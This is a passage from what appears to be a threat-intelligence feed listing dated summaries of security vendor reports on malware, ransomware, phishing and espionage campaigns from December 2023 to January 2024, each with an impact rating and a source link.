Intel Source:
Hunt & Hackett
Intel Name:
Dutch_IT_And_Telecom_Firms_Targeted_by_Turkish_Sea_Turtles_Group
Date of Scan:
2024-01-08
Impact:
LOW
Summary:
The cyber espionage group Sea Turtle (also known as Teal Kurma, Marbled Dust, SILICON, and Cosmic Wolf) has been detected by researchers from the Dutch security firm Hunt & Hackett targeting Kurdish websites, media, ISPs, telcos, and IT service providers in the Netherlands.
Source: https://www.huntandhackett.com/blog/turkish-espionage-campaigns
2024-01-08
Unusual_Prometei_Botnet_Behavior
LOW
Intel Source:
ISC.SANS
Intel Name:
Unusual_Prometei_Botnet_Behavior
Date of Scan:
2024-01-08
Impact:
LOW
Summary:
ISC.SANS researchers have discovered that following several attempts at logging in with different usernames and passwords, the actor utilizing the IP
Source: https://isc.sans.edu/diary/Suspicious+Prometei+Botnet+Activity/30538/
2024-01-08
New_North_Korean_macOS_Backdoor
LOW
Intel Source:
Greg Lesnewich
Intel Name:
New_North_Korean_macOS_Backdoor
Date of Scan:
2024-01-08
Impact:
LOW
Summary:
A new backdoor for Apple macOS named SpectralBlur has been found by cybersecurity experts. It overlaps with a family of malware that is known to be associated with North Korean threat actors.
Source: https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html
2024-01-08
Attacks_on_Ukrainian_Servicemen_Targeting_Recruitment_to_3rd_OSHBr_And_IDF
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Attacks_on_Ukrainian_Servicemen_Targeting_Recruitment_to_3rd_OSHBr_And_IDF
Date of Scan:
2024-01-08
Impact:
MEDIUM
Summary:
Experts from Trend Micro notified CERT-UA of the discovery of suspicious files, the majority of which had military themes. Based on the information obtained, CERT-UA investigated a number of cyberattacks targeting soldiers of the Armed Forces of Ukraine under the pretense of recruiting for the Israel Defense Forces (IDF) and the 3rd Separate Assault Brigade.
Source: https://cert.gov.ua/article/6276988
2024-01-05
Decoys_Govno_DGAs_And_Obfuscation_in_AsyncRAT_Loaders
LOW
Intel Source:
AT&T
Intel Name:
Decoys_Govno_DGAs_And_Obfuscation_in_AsyncRAT_Loaders
Date of Scan:
2024-01-05
Impact:
LOW
Summary:
Researchers at AT&T Alien Labs have discovered a campaign to install AsyncRAT on victim PCs without their knowledge. This threat actor has been distributing the RAT via an initial JavaScript file embedded in a phishing page for at least 11 months. The threat actor remains steadfast in its goals even after more than 300 samples and more than 100 domains.
Source: https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno
2024-01-05
Attack_by_Iranian_APT_using_wipers_on_Albania
MEDIUM
Intel Source:
ClearSkySec
Intel Name:
Attack_by_Iranian_APT_using_wipers_on_Albania
Date of Scan:
2024-01-05
Impact:
MEDIUM
Summary:
The Iranian psychological operations group "Homeland Justice" once more claimed to be eliminating "terrorist supporters" in a video uploaded to its Telegram channel on December 24, 2023, and shared in Albanian. This group has been active since July 2022, concentrating on ransomware and destructive activity directed at Albania. The next day, the actor declared on its official website and Telegram channel that the computer systems and webpages of the following Albanian infrastructure and government agencies had been totally compromised and wiped.
Source: https://www.clearskysec.com/wp-content/uploads/2024/01/No-Justice-Wiper.pdf
2024-01-05
JinxLoader_Delivers_Next_Stage_Malware_Like_Formbook_and_XLoader
LOW
Intel Source:
Palo Alto
Intel Name:
JinxLoader_Delivers_Next_Stage_Malware_Like_Formbook_and_XLoader
Date of Scan:
2024-01-05
Impact:
LOW
Summary:
Researchers from Symantec and Palo Alto Networks reported the existence of JinxLoader, a new Go-based malware loader that is being used to spread next-stage payloads like XLoader and Formbook. The malware was noticed in November 2023, and it was reported that it has been promoted on the hacking forum Hackforums since April 30, 2023. The researchers detected an attack that employed phishing messages purporting to be from the Abu Dhabi National Oil Company (ADNOC).
Source: https://twitter.com/Unit42_Intel/status/1730237085246775562
2024-01-04
UAC_0050_Targeting_Ukraine_With_Remcos_RAT_Pipe_Method
LOW
Intel Source:
Uptycs
Intel Name:
UAC_0050_Targeting_Ukraine_With_Remcos_RAT_Pipe_Method
Date of Scan:
2024-01-04
Impact:
LOW
Summary:
The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection methods.
Source: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method
2024-01-04
Cryptomining_PyPI_Packages_Targeting_Linux
LOW
Intel Source:
Fortinet
Intel Name:
Cryptomining_PyPI_Packages_Targeting_Linux
Date of Scan:
2024-01-04
Impact:
LOW
Summary:
Researchers from Fortinet's FortiGuard Labs have noted that three new malicious packages with the ability to install a cryptocurrency miner on vulnerable Linux computers have been found in the Python Package Index (PyPI) open-source repository.
Source: https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices
2024-01-03
8base_Ransomware_Roundup
MEDIUM
Intel Source:
Fortinet
Intel Name:
8base_Ransomware_Roundup
Date of Scan:
2024-01-03
Impact:
MEDIUM
Summary:
The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants. 8base is a financially motivated ransomware variant most likely based on the Phobos ransomware. Per our FortiRecon information, the 8base ransomware first appeared in May 2023.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-8base
2024-01-03
Malicious_malspam_attachments
LOW
Intel Source:
ISC.SANS
Intel Name:
Malicious_malspam_attachments
Date of Scan:
2024-01-03
Impact:
LOW
Summary:
John Kopriva from ISC.SANS shared his observations from the last 12 months: 1152 potentially malicious attachments of different types were caught by his malspam trap. After he decompressed and/or unpacked all the images and archives, removed all duplicates, and eliminated all the non-malicious files, he was still left with 525 unique malicious samples. 285 of these were PE files with various extensions, and the rest were a wide assortment of scripts, Office files, PDFs, help files, shortcut links, etc.
Source: https://isc.sans.edu/diary/rss/30524
2024-01-03
Analysis_of_the_Ransomware_Attack_On_Boeing
MEDIUM
Intel Source:
Antiy
Intel Name:
Analysis_of_the_Ransomware_Attack_On_Boeing
Date of Scan:
2024-01-03
Impact:
MEDIUM
Summary:
Antiy CERT reviewed recent major attack cases, selected the extortion attack on the Boeing Company that was linked to the LockBit group, and completed a full analysis of it. Antiy CERT has been monitoring attacks for a long time and has analyzed these ransomware attacks. The researchers continued to pay attention to attack organizations such as LockBit, forming a relatively systematic body of analysis. The report relies on intelligence data from the Antiy Cyber Ultrain platform and on public information about this incident released by CISA and other agencies.
Source: https://www.antiy.cn/research/notice&report/research_report/BoeingReport.html
2024-01-03
The_summarized_malware_families_roundups
MEDIUM
Intel Source:
Palo Alto
Intel Name:
The_summarized_malware_families_roundups
Date of Scan:
2024-01-03
Impact:
MEDIUM
Summary:
This article summarizes the malware families (and groups pushing malware) seen by Unit 42. This article reviews all our timely threat intelligence released from October through December 2023.
Source: https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/
2024-01-03
The_implementation_of_Artificial_Intelligence_for_invoice_fraud
LOW
Intel Source:
Resecurity
Intel Name:
The_implementation_of_Artificial_Intelligence_for_invoice_fraud
Date of Scan:
2024-01-03
Impact:
LOW
Summary:
Resecurity discovered a threat actor group, "GXC Team", which is known for crafting tools for online banking theft, e-commerce deception, and internet scams. This time the group introduced a new tool that incorporates Artificial Intelligence into the creation of fraudulent invoices used for wire fraud and Business E-Mail Compromise (BEC). According to an FBI IC3 report, successful business email compromise (BEC) scams (such as invoice fraud) resulted in an average loss of over $120,000 per incident, inflicting a staggering financial toll of more than $2.4 billion on organizations.
Source: https://www.resecurity.com/blog/article/cybercriminals-implemented-artificial-intelligence-ai-for-invoice-fraud
2024-01-02
New_Version_Of_Medusa_Stealer_Released
LOW
Intel Source:
Resecurity
Intel Name:
New_Version_Of_Medusa_Stealer_Released
Date of Scan:
2024-01-02
Impact:
LOW
Summary:
Resecurity researchers last week observed the details of the new Medusa Stealer malware. The release version of Meduza is 2.2, a significantly upgraded password stealer poised to wreak havoc on unsuspecting victims. Its new capabilities include support for more software clients (including browser-based cryptocurrency wallets), an upgraded credit card (CC) grabber, and additional advanced mechanisms for dumping password storage on various platforms to extract credentials and tokens.
Source: https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web
2024-01-02
The_use_of_weaponized_LNK_files_to_exploit_vulnerabilities_in_Windows
MEDIUM
Intel Source:
Cyber Security news
Intel Name:
The_use_of_weaponized_LNK_files_to_exploit_vulnerabilities_in_Windows
Date of Scan:
2024-01-02
Impact:
MEDIUM
Summary:
Last month, cybersecurity researchers at ASEC identified that the Kimsuky group has been actively using the weaponized LNK file to deploy AppleSeed malware. Hackers use weaponized LNK files to exploit vulnerabilities in Windows operating systems. These files often contain malicious code that can be executed when the user clicks on the shortcut.
Source: https://cybersecuritynews.com/kimsuky-appleseed-malware/
2024-01-02
Diving_Deep_into_Cactus_Ransomware
LOW
Intel Source:
SOC Radar
Intel Name:
Diving_Deep_into_Cactus_Ransomware
Date of Scan:
2024-01-02
Impact:
LOW
Summary:
Since its discovery in March 2023, the Cactus Ransomware Group has quickly expanded throughout the digital sphere, in particular taking advantage of flaws in VPNs to obtain unauthorized access and establish a presence on compromised systems. The group has demonstrated a deep understanding of evasion strategies, using a dynamic approach to encryption and a variety of tools and procedures to ensure the efficient and discreet delivery of its malicious payload.
Source: https://socradar.io/dark-web-profile-cactus-ransomware/
2023-12-29
Microsoft_Stops_MSIX_Protocol_Handler_Used_Maliciously
MEDIUM
Intel Source:
Microsoft
Intel Name:
Microsoft_Stops_MSIX_Protocol_Handler_Used_Maliciously
Date of Scan:
2023-12-29
Impact:
MEDIUM
Summary:
After several financially motivated threat groups used the MSIX ms-appinstaller protocol handler to infect Windows users with malware, Microsoft disabled it once more. In order to get around security measures that would normally shield Windows users from malware, such as the Defender SmartScreen anti-phishing and anti-malware component and built-in browser alerts warning users against downloading executable files, the attackers took advantage of the CVE-2021-43890 Windows AppX Installer spoofing vulnerability.
Source: https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/
2023-12-28
New_Zero_Day_in_Barracuda_s_ESG_Appliances
LOW
Intel Source:
Barracuda
Intel Name:
New_Zero_Day_in_Barracuda_s_ESG_Appliances
Date of Scan:
2023-12-28
Impact:
LOW
Summary:
Barracuda posted that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a "limited number" of devices. Assigned CVE-2023-7102, the issue is an arbitrary code execution flaw in the third-party open-source library Spreadsheet::ParseExcel, which is used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware.
Source: https://www.barracuda.com/company/legal/esg-vulnerability https://thehackernews.com/2023/12/chinese-hackers-exploited-new-zero-day.html
2023-12-28
QBit_Stealer_s_source_code_malicious_feature
LOW
+
Intel Source:
Cyble
Intel Name:
QBit_Stealer_s_source_code_malicious_feature
Date of Scan:
2023-12-28
Impact:
LOW
Summary:
After analyzing qBit Stealer’s source code, the Cyble research team discovered a feature unlike that of other stealers: qBit selectively targets files with specific extensions. This characteristic implies its potential use as an exfiltration tool in ransomware operations.
Source: https://cyble.com/blog/decoding-qbit-stealers-source-release-and-data-exfiltration-prowess/
2023-12-28
A_Domain_Controller_is_Threatened_Within_an_Hour_of_Attack
MEDIUM
+
Intel Source:
CERT UA
Intel Name:
A_Domain_Controller_is_Threatened_Within_an_Hour_of_Attack
Date of Scan:
2023-12-28
Impact:
MEDIUM
Summary:
Following an investigation into an incident, CERT-UA researchers discovered that the links used in the attack take the victim to a webpage where, using JavaScript and the "search" ("ms-search") application protocol, a shortcut file is downloaded. When opened, the shortcut launches a PowerShell script that opens a decoy document and downloads, from a remote SMB resource, the Python interpreter together with a Client.py file identified as MASEPIE.
Source: https://cert.gov.ua/article/6276894
2023-12-28
Trend_Analysis_of_Kimsuky_Group_Attacks
LOW
+
Intel Source:
ASEC
Intel Name:
Trend_Analysis_of_Kimsuky_Group_Attacks
Date of Scan:
2023-12-28
Impact:
LOW
Summary:
Spear phishing attacks are a regular tactic used by the Kimsuky threat group to target South Korean users. Typically, the group sends out malicious files disguised as email document attachments. Users may lose control of their machine when they open these attachments.
Source: https://asec.ahnlab.com/en/60054/
2023-12-28
A_Glimpse_into_DShield_Honeypot_Activity
LOW
+
Intel Source:
SANS
Intel Name:
A_Glimpse_into_DShield_Honeypot_Activity
Date of Scan:
2023-12-28
Impact:
LOW
Summary:
SANS ISC researchers have discovered a disruptive malware strain called Mirai, which has caused havoc since it was first identified. It exploits security flaws in IoT devices and turns them into a "botnet", a network of bots that can be used to launch massive network attacks.
Source: https://isc.sans.edu/diary/rss/30514
2023-12-27
Ande_Loader_and_SwaetRAT_analysis
LOW
+
Intel Source:
Esentire
Intel Name:
Ande_Loader_and_SwaetRAT_analysis
Date of Scan:
2023-12-27
Impact:
LOW
Summary:
This article analyzes the malicious payloads used by the PhantomControl threat actors. It explains the process of retrieving the base64-encoded data from the downloaded image, the parameters passed to the "VAI" method, and the core payload, SwaetRAT, which is written in .NET and has keylogging capabilities. It also explains the ID generation algorithm, the commands handled by the ReadPacket class, and the creation of persistence via startup folders and process hollowing techniques. Finally, it provides a YARA rule for SwaetRAT and recommendations for protection.
Source: https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat
2023-12-27
Advanced_Web_Injection_Campaignu_unraveling_the_Tactics_of_a_Sophisticated_Threat
MEDIUM
+
Intel Source:
Security Intelligence
Intel Name:
Advanced_Web_Injection_Campaignu_unraveling_the_Tactics_of_a_Sophisticated_Threat
Date of Scan:
2023-12-27
Impact:
MEDIUM
Summary:
In a recent analysis, IBM Security Trusteer has uncovered a sophisticated web injection campaign that utilizes JavaScript injections, impacting over 40 banks across North America, South America, Europe, and Japan. This malware, possibly linked to DanaBot, employs evasive techniques, including dynamic web injection, to compromise popular banking applications. The injected JavaScript targets specific pages within banking sites, aiming to intercept user credentials and potentially monetize banking information. The attackers purchased malicious domains in December 2022 and have been running campaigns since early 2023. The web injection's dynamic behavior, communication with a command and control server, and adaptability make it a significant threat to the security of financial institutions and their customers. Users are advised to remain vigilant, report suspicious activities, and follow security best practices.
Source: https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
2023-12-27
The_spike_of_phishing_attacks_with_Crypto_drainers
LOW
+
Intel Source:
Checkpoint
Intel Name:
The_spike_of_phishing_attacks_with_Crypto_drainers
Date of Scan:
2023-12-27
Impact:
LOW
Summary:
This article examines the threat of phishing attacks with crypto drainers, which involve malicious smart contracts and deceptive websites to deceive users into giving away their tokens. It explains the Angel Drainer technique, a phishing attack that uses permit functions to transfer tokens without the user's knowledge. Tips are provided on how to safeguard against these attacks.
Source: https://research.checkpoint.com/2023/the-rising-threat-of-phishing-attacks-with-crypto-drainers/
2023-12-27
Threat_Actor_UAC_0099_continues_to_target_Ukraine
LOW
+
Intel Source:
Deep Instinct
Intel Name:
Threat_Actor_UAC_0099_continues_to_target_Ukraine
Date of Scan:
2023-12-27
Impact:
LOW
Summary:
Threat actor 'UAC-0099' has been targeting Ukraine since mid-2022, using a fabricated court summons to bait targets, a RAR SFX with an LNK infection vector, and an HTA infection vector. They have also exploited a WinRAR vulnerability, CVE-2023-38831. To reduce risk, monitoring and limiting PowerShell and scheduled tasks is recommended, as well as updating WinRAR. IOCs and a POC for CVE-2023-38831 can be found on GitHub.
Source: https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine
2023-12-27
PikaBot_Malware_Spreads_via_Malvertising_Campaign_Targeting_AnyDesk_Users
LOW
+
Intel Source:
thehackernews
Intel Name:
PikaBot_Malware_Spreads_via_Malvertising_Campaign_Targeting_AnyDesk_Users
Date of Scan:
2023-12-27
Impact:
LOW
Summary:
Security researchers have uncovered a malvertising campaign spreading the PikaBot malware, particularly targeting users searching for legitimate software like AnyDesk. PikaBot, previously distributed through malspam campaigns, serves as a loader and backdoor, allowing unauthorized remote access to compromised systems. In this campaign, threat actors, including the notorious TA577, leverage malicious Google ads for AnyDesk that redirect victims to a fake website hosting a malicious MSI installer on Dropbox. The malvertising tactic involves bypassing Google's security checks with a tracking URL via a legitimate marketing platform. The attack is reminiscent of malvertising chains previously observed with other loader malware, indicating a potential trend in "malvertising-as-a-service." This discovery follows a surge in malicious ads through Google searches for popular software, indicating a growing threat in browser-based attacks.
Source: https://thehackernews.com/2023/12/new-malvertising-campaign-distributing.html
2023-12-27
Vulnerability_in_Barracuda_Email_Security_Gateway_Appliance
LOW
+
Intel Source:
Barracuda
Intel Name:
Vulnerability_in_Barracuda_Email_Security_Gateway_Appliance
Date of Scan:
2023-12-27
Impact:
LOW
Summary:
According to the findings of Barracuda experts' ongoing investigation, a threat actor deployed a specially crafted Excel email attachment to target a limited number of ESG devices by exploiting an Arbitrary Code Execution (ACE) vulnerability within a third-party library, Spreadsheet::ParseExcel.
Source: https://www.barracuda.com/company/legal/esg-vulnerability
2023-12-26
8220_Gang_Evolving_Tactics_Exploiting_Web_Servers
LOW
+
Intel Source:
Imperva
Intel Name:
8220_Gang_Evolving_Tactics_Exploiting_Web_Servers
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
Imperva Threat Research uncovers new activity from the 8220 gang, a Chinese-origin threat group known for deploying cryptojacking malware on both Windows and Linux web servers. The blog details recent exploits, attack vectors, and indicators of compromise (IoCs), emphasizing the importance of patching and robust security measures for organizations. The group's evolving tactics include exploiting vulnerabilities such as CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883 to propagate malware, with Imperva providing mitigation through its Cloud WAF and on-prem WAF.
Source: https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/
2023-12-26
MageCart_WordPress_Plugin_Injects_Malicious_stuff
LOW
+
Intel Source:
Sucuri
Intel Name:
MageCart_WordPress_Plugin_Injects_Malicious_stuff
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
A new strain of MageCart malware has been identified, targeting WordPress/WooCommerce e-commerce websites. The malware injects itself into the mu-plugins directory, concealing its presence and making removal challenging. Operating under the guise of a fake WordPress Cache Addons plugin, the malware goes to great lengths to avoid detection and removal, even restricting the use of file manager plugins. Notably, it creates a hidden administrator user account, providing attackers sustained access. The malware's primary goal is credit card skimming, injecting sophisticated JavaScript into the website's checkout page.
Source: https://blog.sucuri.net/2023/12/magecart-wordpress-plugin-injects-malicious-user-credit-card-skimmer.html
2023-12-26
A_Comprehensive_Analysis_of_Phishing_Infrastructure_and_Tactics
LOW
+
Intel Source:
Infoblox
Intel Name:
A_Comprehensive_Analysis_of_Phishing_Infrastructure_and_Tactics
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
The United States Postal Service (USPS) has become a prime target for a surge in SMS phishing attacks, colloquially known as smishing, since July. Chinese threat actors dominate this trend, utilizing a dark market toolkit to facilitate attacks on various messaging platforms and carriers. The toolkit's ease of use and affordability have contributed to a notable increase in USPS-themed phishing campaigns. While previous reports have focused on specific campaigns, actors, or the toolkit itself, this analysis delves into a comprehensive examination of over 7,000 USPS-related domains, revealing distinct techniques, tactics, and procedures (TTPs) observable in the Domain Name System (DNS).
Source: https://blogs.infoblox.com/cyber-threat-intelligence/phishers-weather-the-storm-the-dns-landscape-of-us-postal-smishing-attacks/
2023-12-26
Bandook_malware_behavior
LOW
+
Intel Source:
Fortinet
Intel Name:
Bandook_malware_behavior
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
FortiGuard Labs has discovered a new variant of the Bandook malware, a persistent remote access trojan (RAT) with origins dating back to 2007. This latest variant is distributed through a PDF file containing a shortened URL, leading to a password-protected .7z file. Upon extraction, the malware injects its payload into the msinfo32.exe process. The malware exhibits a refined injection process and establishes persistence through registry manipulation. The communication with its command and control (C2) server involves an array of commands, including file manipulation, information stealing, and control over the victim's computer. FortiGuard Labs provides insights into the malware's behavior and the added complexity in its latest variant, offering protections against the identified threats.
Source: https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving
2023-12-26
Analysis_of_SSH_Scanner_Malware_Attacks_on_Linux_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
Analysis_of_SSH_Scanner_Malware_Attacks_on_Linux_Servers
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
AhnLab Security Emergency Response Center (ASEC) has conducted a detailed analysis of recent attack campaigns targeting poorly managed Linux SSH servers. In addition to commonly installed malware like DDoS bots and CoinMiners, threat actors are employing SSH scanner malware to extract valuable information, including IP addresses and SSH account credentials. This article outlines the attack flow, including the utilization of tools such as ShellBot, Tsunami, ChinaZ DDoS Bot, and XMRig CoinMiner.
Source: https://asec.ahnlab.com/en/59972/
2023-12-26
A_Sophisticated_Phishing_Campaign_Targeting_Indian_Government_Personnel
LOW
+
Intel Source:
Seqrite
Intel Name:
A_Sophisticated_Phishing_Campaign_Targeting_Indian_Government_Personnel
Date of Scan:
2023-12-26
Impact:
LOW
Summary:
Operation RusticWeb is an advanced phishing campaign, active since October 2023, that specifically targets Indian government personnel, notably in the defense sector. The threat actors employ Rust-based payloads and encrypted PowerShell scripts for file system enumeration and exfiltration of confidential documents. Noteworthy tactics include the use of fake domains mimicking government entities, such as the Army Welfare Education Society (AWES) and the Department of Personnel & Training. The campaign, exhibiting similarities with known APT groups linked to Pakistan, reflects a shift towards newer programming languages like Rust.
Source: https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/
2023-12-24
Akira_ransomware_came_back
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Akira_ransomware_came_back
Date of Scan:
2023-12-24
Impact:
MEDIUM
Summary:
Sophos observed several incidents involving Akira ransomware, which has had a significant impact across different sectors and countries. According to the evidence, Akira has primarily targeted organizations in Europe, North America, and Australia, and operates in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors.
Source: https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/
2023-12-23
New_UAC_0050_attack_using_RemcosRAT
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
New_UAC_0050_attack_using_RemcosRAT
Date of Scan:
2023-12-23
Impact:
MEDIUM
Summary:
Recently, the CERT-UA has observed the mass distribution of e-mails with the subject "Debts under the Kyivstar contract" and an attachment in the form of the "Subscriber debt.zip" archive.
Source: https://cert.gov.ua/article/6276824
2023-12-21
HR_Themed_Spam_Emails
LOW
+
Intel Source:
Trustwave
Intel Name:
HR_Themed_Spam_Emails
Date of Scan:
2023-12-21
Impact:
LOW
Summary:
Trustwave provided their details on some recent campaigns that use HR-related themes, along with their context and a run-through of their attack flow.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/surfing-the-tidal-waves-of-hr-themed-spam-emails/
2023-12-21
The_Nim_based_Campaign_Using_Microsoft_Word_Docs
LOW
+
Intel Source:
Netskope
Intel Name:
The_Nim_based_Campaign_Using_Microsoft_Word_Docs
Date of Scan:
2023-12-21
Impact:
LOW
Summary:
Netskope did some analysis of a malicious backdoor written in Nim, which is a relatively new programming language. Their blog gives detailed analyses of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.
Source: https://www.netskope.com/blog/a-look-at-the-nim-based-campaign-using-microsoft-word-docs-to-impersonate-the-nepali-government
2023-12-21
Operation_HamsaUpdate
HIGH
+
Intel Source:
Intezer
Intel Name:
Operation_HamsaUpdate
Date of Scan:
2023-12-21
Impact:
HIGH
Summary:
The Israel National Cyber Directorate issued a warning about a phishing campaign actively targeting Israeli customers using F5’s network devices. The operation was named Operation HamsaUpdate. This campaign deploys a newly developed wiper malware that targets both Windows and Linux servers.
Source: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/
2023-12-21
Web_injections_are_on_the_rise
LOW
+
Intel Source:
Security Intelligence
Intel Name:
Web_injections_are_on_the_rise
Date of Scan:
2023-12-21
Impact:
LOW
Summary:
Security Intelligence researchers performed a deep analysis of the web injection used in the recent campaign, covering its evasive techniques, code flow, targets, and the methods employed to reach them. Analysts found that in this new campaign, the threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, to intercept the users’ credentials in order to access them and likely monetize their banking information.
Source: https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
2023-12-21
Some_malware_clusters_spreads_via_email_and_fake_browser_updates
LOW
+
Intel Source:
Proofpoint
Intel Name:
Some_malware_clusters_spreads_via_email_and_fake_browser_updates
Date of Scan:
2023-12-21
Impact:
LOW
Summary:
Proofpoint recently observed the DarkGate remote access Trojan (RAT) being used by multiple cybercrime actors and spread via many methods, such as email, Microsoft Teams, Skype, malvertising, and fake updates. The researchers also provided details about the RogueRaticate and BattleRoyal fake update activity clusters.
Source: https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates
2023-12-20
Modus_operandi_UAC_0177_JokerDPR_attack
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Modus_operandi_UAC_0177_JokerDPR_attack
Date of Scan:
2023-12-20
Impact:
MEDIUM
Summary:
The Ukrainian government CERT-UA investigated one of the incidents, information about which was published in a manipulative form on the JokerDPR Telegram channel. It was found that one of the methods used by JokerDPR "followers", and/or reported on the mentioned channel, is phishing attacks aimed at obtaining unauthorized access to accounts on the mail services Google, Ukr.Net, and Outlook, as well as on the cryptocurrency exchanges EXMO and Binance.
Source: https://cert.gov.ua/article/6276799
2023-12-20
Seedworm_Iranian_Hackers_Target_Telecoms
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Seedworm_Iranian_Hackers_Target_Telecoms
Date of Scan:
2023-12-20
Impact:
MEDIUM
Summary:
The Iranian espionage group Seedworm (aka MuddyWater) attacked telecom companies in Egypt, Sudan, and Tanzania. This group has been active since 2017 and has attacked companies in many countries. It is believed to be a part of Iran’s Ministry of Intelligence and Security. The threat actors used a variety of tools in this activity. Researchers on Symantec’s Threat Hunter Team, part of Broadcom, are investigating the activity and found a MuddyC2Go PowerShell launcher. The attackers also use the SimpleHelp remote access tool and Venom Proxy, which have previously been associated with Seedworm activity, as well as a custom keylogging tool and other publicly available and living-off-the-land tools.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms
2023-12-20
Agent_Tesla_delivery
LOW
+
Intel Source:
Zscaler
Intel Name:
Agent_Tesla_delivery
Date of Scan:
2023-12-20
Impact:
LOW
Summary:
Zscaler analyzed new tactics employed by threat actors to deploy the Agent Tesla malware using CVE-2017-11882. Agent Tesla is an advanced keylogger with features like clipboard logging, screen keylogging, screen capturing, and extracting stored passwords from web browsers.
Source: https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
2023-12-20
JaskaGO_malware_attacks_on_macOS_and_Windows
MEDIUM
+
Intel Source:
AT&T
Intel Name:
JaskaGO_malware_attacks_on_macOS_and_Windows
Date of Scan:
2023-12-20
Impact:
MEDIUM
Summary:
AT&T Alien Labs has discovered a sophisticated malware stealer strain crafted in the Go programming language, posing a severe threat to both Windows and macOS operating systems.
Source: https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows
2023-12-20
Double_Extortion_Attack_Analysis
LOW
+
Intel Source:
ReliaQuest
Intel Name:
Double_Extortion_Attack_Analysis
Date of Scan:
2023-12-20
Impact:
LOW
Summary:
A couple of months ago, ReliaQuest detected some unknown process executions inside a customer’s environment, originating from the Windows debug directory. The analysts' investigation showed that these executions were part of a more significant cyber-threat incident that resulted in double extortion: the encryption of customer data, followed by ransomware deployment and a threat to release the data publicly.
Source: https://www.reliaquest.com/blog/double-extortion-attack-analysis/
2023-12-20
Instagram_Phishing_attacks
LOW
+
Intel Source:
Trustwave
Intel Name:
Instagram_Phishing_attacks
Date of Scan:
2023-12-20
Impact:
LOW
Summary:
Trustwave researchers observed another campaign of Instagram “Copyright Infringement” phishing emails in their spam traps. In this new campaign, the threat actors additionally aim to obtain the victim’s Instagram backup codes. This campaign is an enhanced version of what we reported on the SpiderLabs blog titled “Insta-Phish-A-Gram”.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/instagram-phishing-targets-backup-codes/
2023-12-20
Malicious_JavaScript_samples_to_steal_sensitive_information
LOW
+
Intel Source:
PaloAlto
Intel Name:
Malicious_JavaScript_samples_to_steal_sensitive_information
Date of Scan:
2023-12-20
Impact:
LOW
Summary:
Unit 42 researchers have observed threat actors using malicious JavaScript samples to steal sensitive information by abusing popular survey sites, low-quality hosting, and web chat APIs. In some campaigns, attackers created chatbots that they registered to someone noteworthy such as an Australian footballer. Other malware campaigns had both web skimmers injected into compromised sites and traditional phishing sites.
Source: https://unit42.paloaltonetworks.com/malicious-javascript-steals-sensitive-data/
2023-12-20
Two_novel_techniques_deployed_on_GitHub
MEDIUM
+
Intel Source:
Reversing Labs
Intel Name:
Two_novel_techniques_deployed_on_GitHub
Date of Scan:
2023-12-20
Impact:
MEDIUM
Summary:
ReversingLabs researchers have uncovered two novel techniques running on GitHub — one abusing GitHub Gists, another issuing commands through git commit messages.
Source: https://www.reversinglabs.com/blog/malware-leveraging-public-infrastructure-like-github-on-the-rise
2023-12-19
Ongoing_Exploitation_of_Apache_ActiveMQ_Vulnerability
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Ongoing_Exploitation_of_Apache_ActiveMQ_Vulnerability
Date of Scan:
2023-12-19
Impact:
MEDIUM
Summary:
A recent blog post by AhnLab Security Emergency Response Center (ASEC) reveals that threat actors continue to exploit the Apache ActiveMQ vulnerability (CVE-2023-46604). The vulnerability, allowing remote code execution in the messaging and integration pattern server, has been targeted by various threat actors for deploying Ladon, NetCat, AnyDesk, and z0Miner.
Source: https://asec.ahnlab.com/en/59904/
2023-12-19
Anonymous_Sudan_expansion
LOW
+
Intel Source:
